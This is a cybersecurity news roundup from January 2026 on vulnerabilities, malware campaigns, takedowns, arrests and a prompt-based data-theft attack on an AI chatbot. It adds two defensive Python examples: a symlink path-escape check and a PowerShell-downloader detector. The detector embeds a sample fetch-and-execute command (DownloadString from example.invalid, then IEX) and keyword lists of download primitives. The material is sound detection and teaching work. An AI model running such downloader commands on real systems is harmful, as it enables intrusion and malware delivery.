Microsoft has released its January 2026 Patch Tuesday updates, addressing more than 100 security vulnerabilities across a wide range of its software products, including one actively exploited zero-day and two other vulnerabilities that were previously publicly disclosed. The actively exploited vulnerability, tracked as CVE-2026-20805, affects the Windows Desktop Window Manager and can lead to information disclosure. According to Microsoft, a successful exploit allows an attacker to read memory addresses associated with a remote Advanced Local Procedure Call (ALPC) port.
CISA has warned that a high-severity flaw in the self-hosted Git service Gogs is being actively exploited in the wild. The flaw, tracked as CVE-2025-8110, is a path traversal issue rooted in improper symbolic link handling in the PutContents API; it exists because the earlier fix for CVE-2024-55947 was incomplete. A remote user can write a file to an arbitrary location on the system and thereby execute arbitrary code.
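The bug class behind the Gogs item is worth seeing concretely: a path check that only normalizes `../` is satisfied by a symlink that already lives inside the repository and points outside it. The following is an added example, not Gogs code; the function names and the scratch-repository layout are assumptions made for the demo. It contrasts a lexical containment check with one that resolves the parent directory chain and refuses to open a symlink as the final component.

```python
"""Symlink-aware write containment, illustrating the bug class behind the Gogs
PutContents issue described above.  Added example, not Gogs code: the function
names and the scratch-repository layout are assumptions made for the demo."""
import os
import tempfile


def naive_is_inside(root: str, relpath: str) -> bool:
    """Lexical check only: it collapses '../' but never consults the filesystem,
    so a symlink that already sits inside root and points outside passes."""
    target = os.path.normpath(os.path.join(root, relpath))
    return target == root or target.startswith(root + os.sep)


def safe_write(root: str, relpath: str, data: bytes) -> str:
    """Write data to root/relpath, refusing any path whose parent directory
    resolves outside root and refusing to follow a symlink as the final component."""
    root = os.path.realpath(root)
    target = os.path.normpath(os.path.join(root, relpath))
    if not (target == root or target.startswith(root + os.sep)):
        raise PermissionError(f"lexical traversal: {relpath}")
    # Resolve every symlink in the parent chain against the resolved root.
    parent_real = os.path.realpath(os.path.dirname(target))
    if not (parent_real == root or parent_real.startswith(root + os.sep)):
        raise PermissionError(f"symlinked directory escapes root: {relpath}")
    final = os.path.join(parent_real, os.path.basename(target))
    if os.path.islink(final):
        raise PermissionError(f"refusing to write through symlink: {relpath}")
    # O_NOFOLLOW closes the check-then-open race on POSIX; it is absent on Windows.
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(final, flags, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return final


def demo() -> dict:
    """Build a scratch 'repo' containing a symlink to a sibling directory (the
    attacker-controlled content), then compare the two checks."""
    base = tempfile.mkdtemp()
    repo = os.path.join(base, "repo")
    outside = os.path.join(base, "outside")
    os.makedirs(repo)
    os.makedirs(outside)
    os.symlink(outside, os.path.join(repo, "shared"))   # repo/shared -> ../outside
    rel = os.path.join("shared", "evil.txt")
    result = {"naive_allows": naive_is_inside(repo, rel)}
    try:
        safe_write(repo, rel, b"owned\n")
        result["safe_allows"] = True
    except PermissionError:
        result["safe_allows"] = False
    result["escaped_file_exists"] = os.path.exists(os.path.join(outside, "evil.txt"))
    # A legitimate path under the root is still written normally.
    result["legit_written"] = os.path.isfile(safe_write(repo, "README.md", b"ok\n"))
    return result


if __name__ == "__main__":
    print(demo())
```

The naive check reports `shared/evil.txt` as inside the repository, while `safe_write` rejects it because the resolved parent directory lands outside the resolved root. Resolving the parent rather than the target itself matters: a `realpath` of the full target would silently follow a symlink leaf, so the final component is checked separately and opened with `O_NOFOLLOW`.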
Palo Alto Networks has released security updates to fix a high-severity vulnerability affecting GlobalProtect Gateway and Portal. The flaw, tracked as CVE-2026-0227, is caused by improper handling of exceptional conditions in PAN-OS software and can be abused to trigger a denial-of-service (DoS) condition. A proof-of-concept exploit is available. Palo Alto Networks said that the vulnerability affects only PAN-OS NGFW and Prisma Access configurations with a GlobalProtect gateway or portal enabled; Cloud NGFW is not impacted. There are no workarounds to mitigate the flaw, and the company said it is not aware of malicious exploitation.
SmarterTools has fixed a high-risk vulnerability (CVE-2025-52691) affecting its SmarterMail software. The flaw allows an unauthenticated attacker to upload arbitrary files to arbitrary locations on the mail server, potentially enabling remote code execution. SmarterMail builds 9406 and earlier are affected, and SmarterTools released a fix in Build 9413. While there is no indication that the issue is being exploited in the wild, proof-of-concept (PoC) code for the flaw is available, so all affected users are strongly advised to apply the update as soon as possible.
Russia-linked hackers have launched a cyber-espionage campaign targeting Ukraine’s military personnel by posing as charitable organizations. According to CERT-UA, the attacks took place between October and December 2025 and targeted members of Ukraine’s Defense Forces. The campaign leveraged a previously undocumented strain of malware dubbed ‘PluggyApe.’ CERT-UA attributed the activity to a state-backed group known as Void Blizzard, also tracked as Laundry Bear and designated by Ukrainian authorities as UAC-0190.
Chinese government-backed hackers breached multiple critical infrastructure organizations in North America over the past year, according to Cisco Talos. The group, tracked as UAT-8837, gained initial access using stolen credentials and by exploiting vulnerable servers, including through a Sitecore zero-day vulnerability (CVE-2025-53690). In post-compromise, hands-on-keyboard operations the actor uses a combination of tools including Earthworm, SharpHound, DWAgent, and Certipy.
The DomainTools security team released an analysis of data leaked from Chinese security firm and government cyber contractor Knownsec. The leak shows that Knownsec is closely linked to China’s security and intelligence agencies. Its systems collect and organize large amounts of global internet data and personal information, making it easier to identify, track, and target people and organizations overseas. The vendor’s tools support hacking, surveillance, and long-term access to foreign networks and email accounts. Internal documents indicate that Knownsec mainly serves police, military, and intelligence clients.
Cybersecurity researchers have discovered a previously undocumented malware framework targeting Linux systems, dubbed ‘VoidLink.’ The platform is designed to operate in cloud and container environments. According to analysis by Check Point Research, VoidLink is a cloud-focused implant written primarily in Zig with a flexible modular architecture. It’s based on a custom Plugin API inspired by Cobalt Strike’s Beacon Object Files, supporting more than 30 plug-in modules by default. The modules enable a wide range of capabilities, from credential harvesting and lateral movement to persistence and defense evasion.
An Iranian threat actor known as ‘MuddyWater’ has launched a new spear-phishing campaign targeting diplomatic, maritime, financial, and telecommunications organizations across the Middle East. The attack delivered a Rust-based remote access implant dubbed ‘RustyWater.’
The Trellix Advanced Research Center has spotted an active malware campaign that abuses a DLL sideloading weakness in ‘ahost.exe,’ a legitimate command-line tool shipped with the open-source c-ares library for asynchronous DNS lookups. The campaign mainly delivers commodity malware, including info-stealers such as AgentTesla, FormBook, Lumma Stealer, Vidar, and CryptBot, as well as remote access trojans (RATs) like Remcos, QuasarRAT, DCRat, and XWorm.
A separate Trellix report details a new malicious campaign, in which threat actors are leveraging the browser-in-the-browser (BitB) phishing technique to steal Facebook login credentials.
A new malware campaign, dubbed ‘SHADOW#REACTOR,’ uses a multi-stage infection chain to deploy the commercially available Remcos RAT and establish persistent access to compromised systems. According to researchers at Securonix, the attack begins with an obfuscated Visual Basic Script (VBS) launcher executed via wscript.exe. The script triggers a Base64-encoded PowerShell downloader, which retrieves fragmented, text-based payloads from a remote server.
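The SHADOW#REACTOR chain above (a script host launching PowerShell with a Base64-encoded downloader) is a good candidate for process-creation telemetry detection. The following is an added example, not Securonix's code. The records are constructed JSON lines loosely modelled on Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); the page does not show the campaign's real command lines, so the sample script that gets encoded is invented for the demo.

```python
"""Detection logic for a script host (wscript.exe) spawning PowerShell with a
Base64-encoded downloader.  Added example, not Securonix's code.  The
process-creation records are constructed JSON lines loosely modelled on Sysmon
Event ID 1 fields; the sample PowerShell script is invented for the demo."""
import base64
import json
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover common ones.
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "net.webclient", "invoke-expression")
IEX = re.compile(r"\biex\b", re.I)


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script hidden behind -enc/-EncodedCommand, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))   # tolerate stripped padding
    return raw.decode("utf-16-le", errors="replace")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(record: str) -> dict:
    """Evaluate one JSON process-creation record and return decoded script + findings."""
    ev = json.loads(record)
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    findings = []
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        findings.append("script_host_spawned_powershell")
    decoded = decode_encoded_command(ev.get("CommandLine", ""))
    if decoded is not None:
        findings.append("encoded_command")
        low = decoded.lower()
        if any(h in low for h in DOWNLOAD_HINTS) or IEX.search(decoded):
            findings.append("downloader_in_decoded_command")
    return {"decoded": decoded, "findings": findings}


# Constructed sample: a three-fragment downloader, encoded the way PowerShell expects
# (UTF-16LE, then Base64).  example.invalid is a reserved, non-resolvable name.
SAMPLE_SCRIPT = ('$w=New-Object Net.WebClient;'
                 '$p=(1..3|ForEach-Object{$w.DownloadString("http://example.invalid/part$_.txt")}) -join "";'
                 'IEX $p')
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_LOGS = [
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\System32\wscript.exe",
                "CommandLine": f"powershell.exe -nop -w hidden -enc {SAMPLE_B64}"}),
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"}),
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(analyze(line))
```

The first record yields all three findings and the decoded script; the second (an admin running a file-based script from Explorer) yields none. Decoding the argument rather than matching on the raw command line is the point: the Base64 blob changes with every build of the loader, while the decoded text still exposes the download and execution primitives.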
Socket’s Threat Research Team has discovered five malicious Chrome extensions targeting enterprise platforms like Workday, NetSuite, and SuccessFactors. The extensions steal authentication data, block security controls, and allow full account takeover via session hijacking. The campaign involves three attack types: cookie exfiltration to remote servers, DOM manipulation to block security administration pages, and bidirectional cookie injection for direct session hijacking. Socket says that all five extensions remain under investigation, and that Google's Chrome Web Store security team was informed of the issue.
Security researchers at Varonis have shared details of a new attack called ‘Reprompt’ that could let attackers steal sensitive data from AI chatbots like Microsoft Copilot with just one click on a legitimate link. The attack requires no plugins or further user interaction and can continue even after the chat is closed. Microsoft fixed the issue after it was reported; enterprise users of Microsoft 365 Copilot were not affected.
A security weakness in AWS CodeBuild, dubbed ‘CodeBreach,’ could have allowed attackers to take over AWS’s own GitHub repositories, including the AWS JavaScript SDK. By exploiting a weakness in the repositories’ CI pipelines, attackers might have stolen admin credentials and injected malicious code, potentially impacting all AWS accounts. AWS fixed the issue in September 2025 after cybersecurity firm Wiz reported it.
Sansec discovered an active keylogger on the employee merchandise store of a major US bank. The malware harvests all form data (including passwords and personal information) from over 200,000 potential victims.
Internet infrastructure company Lumen disrupted the Kimwolf DDoS botnet by sinkholing more than 550 command-and-control (C&C) servers. The action cut off malware on nearly 250,000 infected devices from their operators. Although Kimwolf partially recovered within a day, it returned at only a small fraction of its original size. The botnet is known for launching massive DDoS attacks and using residential devices to hide malicious scanning and exploitation activity.
CyberArk has published threat research on the StealC infostealer malware and identified the operator of the service, referred to as YouTubeTA, as a Russian-speaking individual.
Infoblox researchers published a detailed report on a growing ecosystem of service providers that equip criminal networks with the tools, infrastructure, and expertise needed to operate large-scale pig butchering or ‘sha zhu pan’ scams. According to the research, the providers have built a “pig butchering-as-a-service” (PBaaS) economy, similar to malware- and phishing-as-a-service models. Rather than operating alone, scammers can now buy solutions that allow them to run sophisticated fraud campaigns without advanced technical skills.
The latest incarnation of the notorious BreachForums hacking forum had its MyBB user database table leaked online, with over 320,000 accounts exposed. The leak came to light after a website named after the ShinyHunters extortion gang published a 7-Zip archive containing three files, including a MyBB users table and BreachForums’ private PGP key used to sign administrator messages.
Microsoft has disrupted RedVDS, a large cybercrime-as-a-service platform linked to at least $40 million in reported losses in the United States since March 2025. The company filed civil lawsuits in the US and the UK, seizing key infrastructure and taking RedVDS’s marketplace and customer portal offline. The action was part of a coordinated international effort involving Europol and German authorities.
Dutch authorities have arrested the alleged administrator of AVCheck, a cybercrime service used by malware developers to test their malicious software against antivirus detection. The platform enabled criminals to improve malware, helping it evade security defenses before being deployed in real-world attacks.
A Russian national, Oleg Nefedov, has been officially identified as the leader of the BlackBasta ransomware group. German authorities issued a wanted notice for him last week. Nefedov was arrested in Armenia in June 2024 but was released three days later after a judge declined to extend his detention. He subsequently fled to Russia. According to internal BlackBasta chat logs, Nefedov boasted that he contacted Russian officials and secured a “green corridor” to return home safely.
Ukrainian and German law enforcement, with support from Europol, identified members of a Russia-linked ransomware group responsible for cyberattacks causing hundreds of millions of euros in damage worldwide. Two suspects were identified in Ukraine, while the alleged Russian organizer, possibly linked to the Conti ransomware group, has been placed on Interpol’s international wanted list.
Swedish authorities have detained a 33-year-old former IT consultant to the Armed Forces on suspicion of espionage on behalf of Russian intelligence. According to the prosecution, the suspected criminal activity occurred throughout 2025 and into 2026, although investigators believe the alleged spying may have begun as early as 2022, the year Russia launched its full-scale invasion of Ukraine.
An American man is set to plead guilty to a misdemeanor charge for hacking the US Supreme Court’s electronic case filing system. Court documents say 24-year-old Nicholas Moore accessed the system without authorization on 25 days between August and October 2023. Authorities have not disclosed what information was accessed.